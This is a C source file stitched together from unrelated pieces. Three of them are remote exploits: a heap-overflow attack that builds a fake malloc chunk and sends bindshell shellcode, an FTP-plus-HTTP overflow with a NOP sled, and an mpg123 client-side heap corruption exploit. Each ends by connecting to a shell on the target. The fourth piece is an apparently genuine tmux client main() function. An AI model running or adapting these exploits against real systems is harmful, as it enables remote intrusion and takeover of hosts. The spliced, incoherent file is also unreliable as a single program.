    "\x88\x46\x08" /* movb %al, 0x08(%esi) */
    "\x29\xc0" /* subl %eax, %eax */
    "\x89\xc2" /* movl %eax, %edx */
    "\x89\x46\x18" /* movl %eax, 0x18(%esi) */
    "\xb0\x90" /* movb $0x90, %al */
    "\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
    "\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
    "\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
    "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
    "\xb0\x66" /* movb $0x66, %al */
    "\xcd\x80" /* int $0x80 */
    //------------------ listen() -----------------//
    "\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
    "\x43" /* incl %ebx */
    "\x43" /* incl %ebx */
    "\xb0\x66" /* movb $0x66, %al */
    "\xcd\x80" /* int $0x80 */
    //------------------ accept() -----------------//
    "\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
    "\x89\x56\x10" /* movl %edx, 0x10(%esi) */
    "\xb0\x66" /* movb $0x66, %al */
    "\x43" /* incl %ebx */
    "\xcd\x80" /* int $0x80 */
    //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
    "\x86\xc3" /* xchgb %al, %bl */
    "\xb0\x3f" /* movb $0x3f, %al */
    "\x29\xc9" /* subl %ecx, %ecx */
    "\xcd\x80" /* int $0x80 */
    "\xb0\x3f" /* movb $0x3f, %al */
    "\x41" /* incl %ecx */
    "\xcd\x80" /* int $0x80 */
    "\xb0\x3f" /* movb $0x3f, %al */
    "\x41" /* incl %ecx */
    "\xcd\x80" /* int $0x80 */
    //------------------ execve() -----------------//
    "\x88\x56\x07" /* movb %dl, 0x07(%esi) */
    "\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
    "\x87\xf3" /* xchgl %esi, %ebx */
    "\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
    "\xb0\x0b" /* movb $0x0b, %al */
    "\xcd\x80" /* int $0x80 */
    //------------------- callz: ------------------//
    "\xe8\x89\xff\xff\xff" /* call start */
    "/bin/sh"; /* 128byte */
    /* advances an index by one 4-byte slot; evaluates its argument once. */
#define plus_4str(x0x) x0x+=4
    int x0x_num=0;
    int x0x_size=0;
#define BUF_LEN 1024
    char *debug_test;
    char code_128len[BUF_LEN];
    /* 16 bytes, no terminator: not a C string. */
    char x82_16x0x[]={ /* 16byte */
        0x82,0x82,0x82,0x82,0x82,
        0x82,0x82,0x82,0x82,0x82,
        0x82,0x82,0x82,0x82,0x82,
        0x82 };
    char nop_n_jump[4]={0x41,0xeb,0x0c,0x42};
    int nop_12jump=0;
    int ok_cont=0;
    int target_type_number=0;
    char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */
    char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */
    char atk_chunk[BUF_LEN];
    unsigned long retloc=pl_form[target_type_number].retloc;
    unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr;
    memset(ttatk_code,0x00,36864);
    memset(atk_chunk,0x00,BUF_LEN);
    memset(code_128len,0x00,BUF_LEN);
    (void)banrl(argv[0]);
    while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF) {
        switch(roup) {
        case 'R': case 'r':
            retloc=strtoul(optarg,NULL,0);
            break;
        case 'S': case 's':
            retaddr=strtoul(optarg,NULL,0);
            break;
        case 'H': case 'h':
            /* full-size strncpy: no terminator guaranteed for long input. */
            memset(hostname,0x00,0x82);
            strncpy(hostname,optarg,0x82);
            break;
        case 'P': case 'p':
            port=atoi(optarg);
            break;
        case '?':
            (void)usage(argv[0]);
            break;
        }
    }
    //--- make fake chunk ---//
    fprintf(stdout," [1] Make fake chunk.\n");
    /* strlen() on the unterminated x82_16x0x[] reads past the array. */
    for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++)
        atk_chunk[x0x_num]=x82_16x0x[x0x_num];
    *(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P)
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer
    plus_4str(x0x_num);
    //--- make code ---//
    fprintf(stdout," [2] Make shellcode.\n");
    /* 4-byte stepping with long stores assumes sizeof(long)==4. */
    for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump))
        *(long*)&code_128len[nop_12jump]=0x41eb0c42;
    for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++)
        code_128len[ok_cont++]=main_str[x0x_num];
    //--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---//
    snprintf(ttatk_code,36864, "%s%s%s\r\n",atk_chunk,"\x20",code_128len);
    fprintf(stdout," [3] Send exploit (bindshell) code.\n");
    { // Try two times connections. It's Point. :-)
        /* 1 */
        at_sock=setsock(hostname,port);
        re_conenter(at_sock);
        send(at_sock,ttatk_code,strlen(ttatk_code),0);
        close(at_sock);
        /* 2 */
        at_sock=setsock(hostname,port);
        re_conenter(at_sock);
        send(at_sock,ttatk_code,strlen(ttatk_code),0);
    }
    fprintf(stdout," [4] Waiting, executes the shell !\n");
    sleep(3);
    fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
    /* 3 */
    ts_sock=setsock(hostname,36864);
    re_conenter(ts_sock);
    fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
    // Execute bash shell
    getshell(ts_sock);
}
/*
 * Client entry point (OpenBSD tmux, 2.x era). Requires a UTF-8 LC_CTYPE
 * locale: en_US.UTF-8 is tried first, then the environment's locale, and
 * the program refuses to run if that codeset is not UTF-8. It then parses
 * the command line, opens the ptm device, restricts itself with pledge(),
 * decides CLIENT_UTF8, builds the global hooks, environment (including
 * PWD) and option trees (defaults taken from options_table by scope),
 * resolves the socket path and hands control to client_main(), which
 * does not return.
 *
 * Notes: with $TMUX set the client is assumed UTF-8 without consulting
 * the locale variables; -d and -U are in the getopt string but have no
 * case and fall into usage(); -q is accepted and ignored.
 */
int
main(int argc, char **argv)
{
	char					*path, *label, tmp[PATH_MAX];
	char					*shellcmd = NULL, **var;
	const char				*s, *shell;
	int					 opt, flags, keys;
	const struct options_table_entry	*oe;

	if (setlocale(LC_CTYPE, "en_US.UTF-8") == NULL) {
		if (setlocale(LC_CTYPE, "") == NULL)
			errx(1, "invalid LC_ALL, LC_CTYPE or LANG");
		s = nl_langinfo(CODESET);
		if (strcasecmp(s, "UTF-8") != 0 && strcasecmp(s, "UTF8") != 0)
			errx(1, "need UTF-8 locale (LC_CTYPE) but have %s", s);
	}

	setlocale(LC_TIME, "");
	tzset();

	/* A leading '-' in argv[0] means we were started as a login shell. */
	if (**argv == '-')
		flags = CLIENT_LOGIN;
	else
		flags = 0;

	label = path = NULL;
	while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
		switch (opt) {
		case '2':
			flags |= CLIENT_256COLOURS;
			break;
		case 'c':
			free(shellcmd);
			shellcmd = xstrdup(optarg);
			break;
		case 'C':
			/* A second -C upgrades control mode to control-control. */
			if (flags & CLIENT_CONTROL)
				flags |= CLIENT_CONTROLCONTROL;
			else
				flags |= CLIENT_CONTROL;
			break;
		case 'V':
			printf("%s %s\n", getprogname(), VERSION);
			exit(0);
		case 'f':
			set_cfg_file(optarg);
			break;
		case 'l':
			flags |= CLIENT_LOGIN;
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'q':
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'u':
			flags |= CLIENT_UTF8;
			break;
		case 'v':
			log_add_level();
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c takes the whole command; positional arguments are an error. */
	if (shellcmd != NULL && argc != 0)
		usage();

	/* Open the pty multiplexer before pledge() narrows what is allowed. */
	if ((ptm_fd = getptmfd()) == -1)
		err(1, "getptmfd");
	if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd "
	    "recvfd proc exec tty ps", NULL) != 0)
		err(1, "pledge");

	/*
	 * tmux is a UTF-8 terminal, so if TMUX is set, assume UTF-8.
	 * Otherwise, if the user has set LC_ALL, LC_CTYPE or LANG to contain
	 * UTF-8, it is a safe assumption that either they are using a UTF-8
	 * terminal, or if not they know that output from UTF-8-capable
	 * programs may be wrong.
	 */
	if (getenv("TMUX") != NULL)
		flags |= CLIENT_UTF8;
	else {
		s = getenv("LC_ALL");
		if (s == NULL || *s == '\0')
			s = getenv("LC_CTYPE");
		if (s == NULL || *s == '\0')
			s = getenv("LANG");
		if (s == NULL || *s == '\0')
			s = "";
		if (strcasestr(s, "UTF-8") != NULL ||
		    strcasestr(s, "UTF8") != NULL)
			flags |= CLIENT_UTF8;
	}

	global_hooks = hooks_create(NULL);

	/* Seed the global environment from the process environment. */
	global_environ = environ_create();
	for (var = environ; *var != NULL; var++)
		environ_put(global_environ, *var);
	if (getcwd(tmp, sizeof tmp) != NULL)
		environ_set(global_environ, "PWD", "%s", tmp);

	/* Each table entry is applied to the tree matching its scope. */
	global_options = options_create(NULL);
	global_s_options = options_create(NULL);
	global_w_options = options_create(NULL);
	for (oe = options_table; oe->name != NULL; oe++) {
		if (oe->scope == OPTIONS_TABLE_SERVER)
			options_default(global_options, oe);
		if (oe->scope == OPTIONS_TABLE_SESSION)
			options_default(global_s_options, oe);
		if (oe->scope == OPTIONS_TABLE_WINDOW)
			options_default(global_w_options, oe);
	}

	/*
	 * The default shell comes from SHELL or from the user's passwd entry
	 * if available.
	 */
	shell = getshell();
	options_set_string(global_s_options, "default-shell", 0, "%s", shell);

	/* Override keys to vi if VISUAL or EDITOR are set. */
	if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
		/* Only the basename of the editor is inspected. */
		if (strrchr(s, '/') != NULL)
			s = strrchr(s, '/') + 1;
		if (strstr(s, "vi") != NULL)
			keys = MODEKEY_VI;
		else
			keys = MODEKEY_EMACS;
		options_set_number(global_s_options, "status-keys", keys);
		options_set_number(global_w_options, "mode-keys", keys);
	}

	/*
	 * If socket is specified on the command-line with -S or -L, it is
	 * used. Otherwise, $TMUX is checked and if that fails "default" is
	 * used.
	 */
	if (path == NULL && label == NULL) {
		s = getenv("TMUX");
		if (s != NULL && *s != '\0' && *s != ',') {
			/* $TMUX is "path,pid,index"; keep only the path. */
			path = xstrdup(s);
			path[strcspn(path, ",")] = '\0';
		}
	}
	if (path == NULL && (path = make_label(label)) == NULL) {
		fprintf(stderr, "can't create socket: %s\n", strerror(errno));
		exit(1);
	}
	socket_path = path;
	free(label);

	/* Pass control to the client. */
	exit(client_main(osdep_event_init(), argc, argv, flags, shellcmd));
}
/*
 * Entry point of this proof of concept, which first runs an FTP session
 * (ftp_parse() on port 21, with -u user, -a password and -c directory) and
 * then sends one HTTP request to -p/D_PORT. The remaining options mirror
 * the sibling tool: -t/-T target index into __pl_form[] (must be < 6),
 * -h/-H host, -i/-I hint. After the request is written it sleeps ten
 * seconds and calls getshell() against port 26112.
 *
 * Review notes: retaddr is a u_long but printed with %p (format/argument
 * mismatch); write() always sends the full 3150 bytes of sendbuf whatever
 * snprintf() produced, so the uninitialised tail of the buffer is
 * transmitted; the sock_connect() results and the write() return value
 * are not checked; `i`, `buf` and `sd`'s failure are unused/unchecked;
 * -x/-X are in the getopt string but have no case and are silently
 * ignored; the `< 6` test on -t accepts negative indices. D_PORT, D_HOST,
 * __pl_form, user, pass, writedir, shell, banrl(), printe(),
 * x_fp_rm_usage(), sock_connect(), ftp_parse() and getshell() are defined
 * elsewhere in the file (not visible here).
 */
int main(int argc,char *argv[]) {
    int port=D_PORT;
    char hostname[0x333]=D_HOST;
    int whlp,type=0;
    unsigned int i=0;
    char buf[141];
    char buf2[2078];
    char sendbuf[3150];
    char buf3[141];
    int sd;
    int ftpsd;
    u_long retaddr=__pl_form[type].retaddr;
    (void)banrl();
    while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF) {
        extern char *optarg;
        switch(whlp) {
        case 'T': case 't':
            /* only the upper bound is checked; negatives slip through. */
            if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; }
            else (void)x_fp_rm_usage(argv[0]);
            break;
        case 'H': case 'h':
            memset((char *)hostname,0,sizeof(hostname));
            strncpy(hostname,optarg,sizeof(hostname)-1);
            break;
        case 'u':
            /* first occurrence wins; later -u values are ignored. */
            if(!user&&!(user=(char *)strdup(optarg)))
                printe("main(): allocating memory failed.",1);
            break;
        case 'a':
            if(!pass&&!(pass=(char *)strdup(optarg)))
                printe("main(): allocating memory failed.",1);
            break;
        case 'c':
            if(!writedir&&!(writedir=(char *)strdup(optarg)))
                printe("main(): allocating memory failed.",1);
            break;
        case 'P': case 'p':
            port=atoi(optarg);
            break;
        case 'I': case 'i':
            fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
            exit(-1);
        case '?':
            (void)x_fp_rm_usage(argv[0]);
            break;
        }
    }
    /* D_HOST doubles as the "no host given" sentinel. */
    if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); }
    else {
        fprintf(stdout," [+] Hostname: %s\n",hostname);
        fprintf(stdout," [+] Port num: %d\n",port);
        fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
    }
    fprintf(stdout," [1] #1 Set codes.\n");
    ftpsd=sock_connect(hostname,21);
    ftp_parse(ftpsd);
    memset(buf3,0x42,141);
    memset(buf2,0x90,1000);
    memcpy(buf2+1000,shell,strlen(shell));
    memset(buf2+1000+strlen(shell),0x90,1000);
    snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2);
    fprintf(stdout," [1] #1 Set socket.\n");
    sd=sock_connect(hostname,port);
    fprintf(stdout," [1] #1 Send codes.\n");
    /* sends the whole buffer, not just the formatted length. */
    write(sd,sendbuf,3150);
    close(sd);
    sleep(10);
    fprintf(stdout," [1] #3 Get shell.\n");
    getshell(hostname,26112);
    exit(0);
}
/* start of operations. */
/*
 * Entry point of the mpg123 client-side proof of concept named in the
 * banner. Options: -p server port (required; checked with `if(!port)`),
 * -s bindshell port (patched into x86_exec[33..34]), -g and -r hex
 * addresses read with sscanf("%x"), -+ a return offset in 4-byte units,
 * -t a preset index into target[] (rejected with a message when out of
 * range), -l lists presets. After printing the chosen values it waits in
 * audioserver_bind() and runs getshell() against the host that connected;
 * falling through to the final printf is reported as failure.
 *
 * Review notes: port, sport, gotaddr, requestaddr, retoffset, target[],
 * x86_exec, platform_list(), usage(), audioserver_bind() and getshell()
 * are globals/functions defined elsewhere in the file (not visible here);
 * sscanf() return values are not checked, so unparsable -g/-r leave the
 * previous value in place; atoi(optarg) is re-evaluated several times per
 * -t; '+' as an option letter is outside the portable getopt() character
 * set, so its handling is implementation-dependent.
 */
int main(int argc,char **argv){
    unsigned int i=0;
    int chr=0;
    char *hostptr, *nameptr="none";
    printf("[*] mpg123[v0.59r,v0.59s]: remote client-side heap corruption"
    " exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realh"
    "alo)\n\n");
    while((chr=getopt(argc,argv,"p:s:g:r:+:t:l"))!=EOF){
        switch(chr){
        case 'p':
            port=atoi(optarg);
            break;
        case 's':
            sport=atoi(optarg);
            break;
        case 'g':
            sscanf(optarg,"%x",&gotaddr);
            break;
        case 'r':
            sscanf(optarg,"%x",&requestaddr);
            break;
        case '+':
            retoffset=(atoi(optarg)*4);
            break;
        case 't':
            /* count the presets; the table ends at a NULL p_name. */
            i=0;
            while(target[i].p_name)i++;
            if(atoi(optarg)>=i)
                printf("[!] %u is not a valid target, ignored.\n",atoi(optarg));
            else{
                nameptr=target[atoi(optarg)].p_name;
                gotaddr=target[atoi(optarg)].p_gotaddr;
                requestaddr=target[atoi(optarg)].p_requestaddr;
                retoffset=(target[atoi(optarg)].p_retoffset*4);
            }
            break;
        case 'l':
            platform_list();
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
    if(!port)usage(argv[0]);
    /* verbose display. */
    printf("[*] platform value base\t\t: %s.\n",nameptr);
    printf("[*] fprintf GOT address\t\t: 0x%.8x.\n",gotaddr);
    printf("[*] *request address location\t: 0x%.8x.\n",requestaddr);
    printf("[*] *request offset(+?*4)\t: %u(=%u), ret=0x%.8x.\n\n",
    (retoffset/4),retoffset,(requestaddr+retoffset));
    /* set the bindshell port in the shellcode(byte 33/34). */
    x86_exec[33]=(sport&0xff00)>>8;
    x86_exec[34]=(sport&0x00ff);
    /* audioserver_bind() returns the host that connected to it. */
    hostptr=audioserver_bind();
    /* check the host for success, see if the bindshell is listening. */
    getshell(hostptr);
    printf("[!] exploit failed.\n");
    exit(0);
}